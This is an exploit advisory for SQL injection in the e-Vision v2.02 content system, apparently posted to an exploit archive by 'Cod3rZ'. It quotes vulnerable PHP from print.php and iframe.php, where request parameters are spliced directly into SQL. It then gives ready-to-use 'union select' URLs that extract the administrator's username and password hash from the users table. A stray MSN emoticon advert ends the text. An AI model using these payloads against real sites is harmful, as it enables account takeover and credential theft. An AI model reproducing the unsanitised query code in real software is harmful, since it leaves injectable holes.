--------------------------------------------------------------------------------------------------------------------------- _ ____ _ _ _ _ __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| --------------------------------------------------------------------------------------------------------------------------- e-Vision v2.02 Multiple Remote SQL Injection --------------------------------------------------------------------------------------------------------------------------- Author: Cod3rZ Site: http://cod3rz.helloweb.eu --------------------------------------------------------------------------------------------------------------------------- PoC: (print.php) --------------------------------------------------------------------------------------------------------------------------- $idcontent = $_GET['id']; $sql = "SELECT `idcontainer` FROM `content` WHERE `idcontent`='".$idcontent."'"; $res = mysql_query($sql); $row = mysql_fetch_array($res); --------------------------------------------------------------------------------------------------------------------------- nickname: print.php?id='+union+select+username+from+users+where+idusers=1/* password: print.php?id='+union+select+pass+from+users+where+idusers=1/* --------------------------------------------------------------------------------------------------------------------------- PoC: (iframe.php) --------------------------------------------------------------------------------------------------------------------------- $sql = "SELECT `".$_GET['field']."` FROM ".$_GET['module']." WHERE `id".$_GET['module']."`='".$_GET['id']."'"; $result = mysql_query($sql); $row = mysql_fetch_array($result); --------------------------------------------------------------------------------------------------------------------------- nickname: iframe.php?field=idcontainer&module=content&id='+union+select+username+from+users+where+idusers=1/* password: iframe.php?field=idcontainer&module=content&id='+union+select+pass+from+users+where+idusers=1/* --------------------------------------------------------------------------------------------------------------------------- That's All Bye, Cod3rZ _________________________________________________________________ Scarica GRATIS le tue emoticon preferite! http://intrattenimento.it.msn.com/emoticon/